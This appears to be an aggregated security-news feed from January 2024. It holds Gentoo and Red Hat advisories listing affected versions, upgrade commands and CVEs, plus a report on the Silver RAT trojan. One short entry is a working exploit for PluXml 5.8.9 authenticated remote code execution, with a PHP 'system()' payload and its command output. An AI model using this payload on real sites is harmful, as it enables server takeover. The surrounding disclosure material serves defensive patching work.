Gentoo Linux Security Advisory 202401-12 - Multiple vulnerabilities have been found in Synapse, the worst of which could result in information leaks. Versions greater than or equal to 1.96.0 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-12  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Synapse: Multiple Vulnerabilities  
     Date: January 07, 2024  
     Bugs: #914765, #916609  
       ID: 202401-12

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilites have been found in Synapse, the worst of which  
could result in information leaks.

Background  
==========

Synapse is a Matrix homeserver written in Python/Twisted.

Affected packages  
=================

Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
net-im/synapse  < 1.96.0      >= 1.96.0

Description  
===========

Multiple vulnerabilities have been discovered in Synapse. Please review  
the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Synapse users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=net-im/synapse-1.96.0"

References  
==========

[ 1 ] CVE-2023-41335  
      https://nvd.nist.gov/vuln/detail/CVE-2023-41335  
[ 2 ] CVE-2023-42453  
      https://nvd.nist.gov/vuln/detail/CVE-2023-42453  
[ 3 ] CVE-2023-43796  
      https://nvd.nist.gov/vuln/detail/CVE-2023-43796  
[ 4 ] CVE-2023-45129  
      https://nvd.nist.gov/vuln/detail/CVE-2023-45129

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-12

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-12

Gentoo Linux Security Advisory 202401-11 - Multiple vulnerabilities have been found in Apache Batik, the worst of which could result in arbitrary code execution. Versions greater than or equal to 1.17 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-11  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Apache Batik: Multiple Vulnerabilities  
     Date: January 07, 2024  
     Bugs: #724534, #872689, #918088  
       ID: 202401-11

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Apache Batik, the worst of  
which could result in arbitrary code execution.

Background  
==========

Apache Batik is a Java-based toolkit for applications or applets that  
want to use images in the Scalable Vector Graphics (SVG) format for  
various purposes, such as display, generation or manipulation.

Affected packages  
=================

Package         Vulnerable    Unaffected  
--------------  ------------  ------------  
dev-java/batik  < 1.17        >= 1.17

Description  
===========

Multiple vulnerabilities have been discovered in Apache Batik. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Apache Batik users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-java/batik-1.17"

References  
==========

[ 1 ] CVE-2018-8013  
      https://nvd.nist.gov/vuln/detail/CVE-2018-8013  
[ 2 ] CVE-2019-17566  
      https://nvd.nist.gov/vuln/detail/CVE-2019-17566  
[ 3 ] CVE-2020-11987  
      https://nvd.nist.gov/vuln/detail/CVE-2020-11987  
[ 4 ] CVE-2022-38398  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38398  
[ 5 ] CVE-2022-38648  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38648  
[ 6 ] CVE-2022-40146  
      https://nvd.nist.gov/vuln/detail/CVE-2022-40146  
[ 7 ] CVE-2022-41704  
      https://nvd.nist.gov/vuln/detail/CVE-2022-41704  
[ 8 ] CVE-2022-42890  
      https://nvd.nist.gov/vuln/detail/CVE-2022-42890  
[ 9 ] CVE-2022-44729  
      https://nvd.nist.gov/vuln/detail/CVE-2022-44729  
[ 10 ] CVE-2022-44730  
      https://nvd.nist.gov/vuln/detail/CVE-2022-44730

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-11

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-11

Gentoo Linux Security Advisory 202401-10 - Multiple vulnerabilities have been found in Mozilla Firefox, the worst of which could lead to remote code execution. Versions greater than or equal to 115.6.0:esr are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-10  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: Mozilla Firefox: Multiple Vulnerabilities  
     Date: January 07, 2024  
     Bugs: #908245, #914073, #918433, #920507  
       ID: 202401-10

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Mozilla Firefox, the worst  
of which could lead to remote code execution.

Background  
==========

Mozilla Firefox is a popular open-source web browser from the Mozilla  
project.

Affected packages  
=================

Package                 Vulnerable     Unaffected  
----------------------  -------------  --------------  
www-client/firefox      < 115.6.0:esr  >= 115.6.0:esr  
                        < 121.0:rapid  >= 121.0:rapid  
www-client/firefox-bin  < 115.6.0:esr  >= 115.6.0:esr  
                        < 121.0:rapid  >= 121.0:rapid

Description  
===========

Multiple vulnerabilities have been discovered in Mozilla Firefox. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Mozilla Firefox ESR binary users should upgrade to the latest  
version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-115.6.0:esr"

All Mozilla Firefox ESR users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-115.6.0:esr"

All Mozilla Firefox binary users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-121.0:rapid"

All Mozilla Firefox users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/firefox-121.0:rapid"

References  
==========

[ 1 ] CVE-2023-3482  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3482  
[ 2 ] CVE-2023-4058  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4058  
[ 3 ] CVE-2023-4579  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4579  
[ 4 ] CVE-2023-4863  
      https://nvd.nist.gov/vuln/detail/CVE-2023-4863  
[ 5 ] CVE-2023-5129  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5129  
[ 6 ] CVE-2023-5170  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5170  
[ 7 ] CVE-2023-5172  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5172  
[ 8 ] CVE-2023-5173  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5173  
[ 9 ] CVE-2023-5175  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5175  
[ 10 ] CVE-2023-5722  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5722  
[ 11 ] CVE-2023-5723  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5723  
[ 12 ] CVE-2023-5729  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5729  
[ 13 ] CVE-2023-5731  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5731  
[ 14 ] CVE-2023-5758  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5758  
[ 15 ] CVE-2023-6135  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6135  
[ 16 ] CVE-2023-6210  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6210  
[ 17 ] CVE-2023-6211  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6211  
[ 18 ] CVE-2023-6213  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6213  
[ 19 ] CVE-2023-6856  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6856  
[ 20 ] CVE-2023-6857  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6857  
[ 21 ] CVE-2023-6858  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6858  
[ 22 ] CVE-2023-6859  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6859  
[ 23 ] CVE-2023-6860  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6860  
[ 24 ] CVE-2023-6861  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6861  
[ 25 ] CVE-2023-6862  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6862  
[ 26 ] CVE-2023-6863  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6863  
[ 27 ] CVE-2023-6864  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6864  
[ 28 ] CVE-2023-6865  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6865  
[ 29 ] CVE-2023-6866  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6866  
[ 30 ] CVE-2023-6867  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6867  
[ 31 ] CVE-2023-6868  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6868  
[ 32 ] CVE-2023-6869  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6869  
[ 33 ] CVE-2023-6870  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6870  
[ 34 ] CVE-2023-6871  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6871  
[ 35 ] CVE-2023-6872  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6872  
[ 36 ] CVE-2023-6873  
      https://nvd.nist.gov/vuln/detail/CVE-2023-6873  
[ 37 ] CVE-2023-32205  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32205  
[ 38 ] CVE-2023-32206  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32206  
[ 39 ] CVE-2023-32207  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32207  
[ 40 ] CVE-2023-32208  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32208  
[ 41 ] CVE-2023-32209  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32209  
[ 42 ] CVE-2023-32210  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32210  
[ 43 ] CVE-2023-32211  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32211  
[ 44 ] CVE-2023-32212  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32212  
[ 45 ] CVE-2023-32213  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32213  
[ 46 ] CVE-2023-32214  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32214  
[ 47 ] CVE-2023-32215  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32215  
[ 48 ] CVE-2023-32216  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32216  
[ 49 ] CVE-2023-34414  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34414  
[ 50 ] CVE-2023-34415  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34415  
[ 51 ] CVE-2023-34416  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34416  
[ 52 ] CVE-2023-34417  
      https://nvd.nist.gov/vuln/detail/CVE-2023-34417  
[ 53 ] CVE-2023-37203  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37203  
[ 54 ] CVE-2023-37204  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37204  
[ 55 ] CVE-2023-37205  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37205  
[ 56 ] CVE-2023-37206  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37206  
[ 57 ] CVE-2023-37209  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37209  
[ 58 ] CVE-2023-37210  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37210  
[ 59 ] CVE-2023-37212  
      https://nvd.nist.gov/vuln/detail/CVE-2023-37212  
[ 60 ] MFSA-2023-40  
[ 61 ] MFSA-TMP-2023-0002

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-10

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-10

PluXml Blog version 5.8.9 suffers from a remote code execution vulnerability.

    ## Exploit Title: PluXml Blog Version : 5.8.9 - Remote Code Execution (Authenticated)### Date: 2024-1-7### Exploit Author: tmrswrr### Category: Webapps### Vendor Homepage: https://pluxml.org/### Version : 5.8.9### Tested on: https://www.softaculous.com/apps/cms/PluXml1 ) After login Click Static pages > Edit > Write in content your payload : https://127.0.0.1/PluXml/core/admin/statique.php?p=001    Payload : <?php echo system('id'); ?>2 ) Save and View page Static 1 on site :https://127.0.0.1/PluXml/static1/static-1    Result: uid=1000(soft) gid=1000(soft) groups=1000(soft) uid=1000(soft) gid=1000(soft) groups=1000(soft)

PluXml Blog 5.8.9 Remote Code Execution

Gentoo Linux Security Advisory 202401-9 - Multiple vulnerabilities have been found in Eclipse Mosquitto which could result in denial of service. Versions greater than or equal to 2.0.17 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-09  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Low  
    Title: Eclipse Mosquitto: Multiple Vulnerabilities  
     Date: January 07, 2024  
     Bugs: #918540  
       ID: 202401-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been found in Eclipse Mosquitto which  
could result in denial of service.

Background  
==========

Eclipse Mosquitto is an open source MQTT v3 broker.

Affected packages  
=================

Package             Vulnerable    Unaffected  
------------------  ------------  ------------  
app-misc/mosquitto  < 2.0.17      >= 2.0.17

Description  
===========

Multiple vulnerabilities have been discovered in Eclipse Mosquitto.  
Please review the CVE identifier referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All Eclipse Mosquitto users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-misc/mosquitto-2.0.17"

References  
==========

[ 1 ] CVE-2023-0809  
      https://nvd.nist.gov/vuln/detail/CVE-2023-0809  
[ 2 ] CVE-2023-3592  
      https://nvd.nist.gov/vuln/detail/CVE-2023-3592  
[ 3 ] CVE-2023-28366  
      https://nvd.nist.gov/vuln/detail/CVE-2023-28366

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-09

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-09

Gentoo Linux Security Advisory 202401-8 - Multiple vulnerabilities have been discovered in util-linux which can lead to denial of service or information disclosure. Versions greater than or equal to 2.37.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-08  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: util-linux: Multiple Vulnerabilities  
     Date: January 07, 2024  
     Bugs: #806070, #831978, #833365  
       ID: 202401-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in util-linux which can  
lead to denial of service or information disclosure.

Background  
==========

util-linux is a suite of Linux programs including mount and umount,  
programs used to mount and unmount filesystems.

Affected packages  
=================

Package              Vulnerable    Unaffected  
-------------------  ------------  ------------  
sys-apps/util-linux  < 2.37.4      >= 2.37.4

Description  
===========

Multiple vulnerabilities have been discovered in util-linux. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All util-linux users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=sys-apps/util-linux-2.37.4"

References  
==========

[ 1 ] CVE-2021-3995  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3995  
[ 2 ] CVE-2021-3996  
      https://nvd.nist.gov/vuln/detail/CVE-2021-3996  
[ 3 ] CVE-2021-37600  
      https://nvd.nist.gov/vuln/detail/CVE-2021-37600  
[ 4 ] CVE-2022-0563  
      https://nvd.nist.gov/vuln/detail/CVE-2022-0563

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-08

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-08

Red Hat Security Advisory 2024-0072-03 - An update for squid is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include buffer over-read, denial of service, and null pointer vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0072.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: squid security updateAdvisory ID:        RHSA-2024:0072-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0072Issue date:         2024-01-08Revision:           03CVE Names:          CVE-2023-5824====================================================================Summary: An update for squid is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.Security Fix(es):* squid: DoS against HTTP and HTTPS (CVE-2023-5824)* squid: Denial of Service in SSL Certificate validation (CVE-2023-46724)* squid: NULL pointer dereference in the gopher protocol code (CVE-2023-46728)* squid: Buffer over-read in the HTTP Message processing feature (CVE-2023-49285)* squid: Incorrect Check of Function Return Value In Helper Process management (CVE-2023-49286)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-5824References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2245914https://bugzilla.redhat.com/show_bug.cgi?id=2247567https://bugzilla.redhat.com/show_bug.cgi?id=2248521https://bugzilla.redhat.com/show_bug.cgi?id=2252923https://bugzilla.redhat.com/show_bug.cgi?id=2252926

Red Hat Security Advisory 2024-0072-03

Red Hat Security Advisory 2024-0071-03 - An update for squid is now available for Red Hat Enterprise Linux 9. Issues addressed include buffer over-read, denial of service, and null pointer vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0071.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: squid security updateAdvisory ID:        RHSA-2024:0071-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:0071Issue date:         2024-01-08Revision:           03CVE Names:          CVE-2023-46724====================================================================Summary: An update for squid is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Squid is a high-performance proxy caching server for web clients, supporting FTP, Gopher, and HTTP data objects.Security Fix(es):* squid: Denial of Service in SSL Certificate validation (CVE-2023-46724)* squid: NULL pointer dereference in the gopher protocol code (CVE-2023-46728)* squid: Buffer over-read in the HTTP Message processing feature (CVE-2023-49285)* squid: Incorrect Check of Function Return Value In Helper Process management (CVE-2023-49286)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-46724References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2247567https://bugzilla.redhat.com/show_bug.cgi?id=2248521https://bugzilla.redhat.com/show_bug.cgi?id=2252923https://bugzilla.redhat.com/show_bug.cgi?id=2252926

Red Hat Security Advisory 2024-0071-03

Gentoo Linux Security Advisory 202401-7 - A vulnerability was found in R which could allow for remote code execution. Versions greater than or equal to 4.0.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202401-07  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: R: Directory Traversal  
     Date: January 06, 2024  
     Bugs: #765361  
       ID: 202401-07

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

A vulnerability was found in R which could allow for remote code  
execution.

Background  
==========

R is a language and environment for statistical computing and graphics.

Affected packages  
=================

Package     Vulnerable    Unaffected  
----------  ------------  ------------  
dev-lang/R  < 4.0.4       >= 4.0.4

Description  
===========

The native R package installation mechanisms do not sufficiently  
validate installed source packages for path traversal.

Impact  
======

Installation of a malicious R package could result in an arbitrary file  
overwrite which could result in arbitrary code execution, as might be  
seen with the overwrite of an authorized_keys file.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All R users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=dev-lang/R-4.0.4"

References  
==========

[ 1 ] CVE-2020-27637  
      https://nvd.nist.gov/vuln/detail/CVE-2020-27637  
[ 2 ] -fno-common  
[ 3 ] gcc-10

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202401-07

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202401-07

Threat actors operating under the name Anonymous Arabic have released a remote access trojan (RAT) called Silver RAT that’s equipped to bypass security software and stealthily launch hidden applications.
“The developers operate on multiple hacker forums and social media platforms, showcasing an active and sophisticated presence,” cybersecurity firm Cyfirma said in a report

Threat actors operating under the name Anonymous Arabic have released a remote access trojan (RAT) called **Silver RAT** that's equipped to bypass security software and stealthily launch hidden applications.

"The developers operate on multiple hacker forums and social media platforms, showcasing an active and sophisticated presence," cybersecurity firm Cyfirma said in a report published last week.

The actors, assessed to be of Syrian origin and linked to the development of another RAT known as S500 RAT, also run a Telegram channel offering various services such as the distribution of cracked RATs, leaked databases, carding activities, and the sale of Facebook and X (formerly Twitter) bots.

The social media bots are then utilized by other cyber criminals to promote various illicit services by automatically engaging with and commenting on user content.

In-the-wild detections of Silver RAT v1.0 were first observed in November 2023, although the threat actor's plans to release the trojan were first made official a year before. It was cracked and leaked on Telegram around October 2023.

The C#-based malware boasts of a wide range of features to connect to a command-and-control (C2) server, log keystrokes, destroy system restore points, and even encrypt data using ransomware. There are also indications that an Android version is in the works.

"While generating a payload using Silver RAT's builder, threat actors can select various options with a payload size up to a maximum of 50kb," the company noted. "Once connected, the victim appears on the attacker-controlled Silver RAT panel, which displays the logs from the victim based on the functionalities chosen."

An interesting evasion feature built into Silver RAT is its ability to delay the execution of the payload by a specific time as well as covertly launch apps and take control of the compromised host.

Further analysis of the malware author's online footprint shows that one of the members of the group is likely in their mid-20s and based in Damascus.

"The developer \[...\] appears supportive of Palestine based on their Telegram posts, and members associated with this group are active across various arenas, including social media, development platforms, underground forums, and Clearnet websites, suggesting their involvement in distributing various malware," Cyfirma said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#web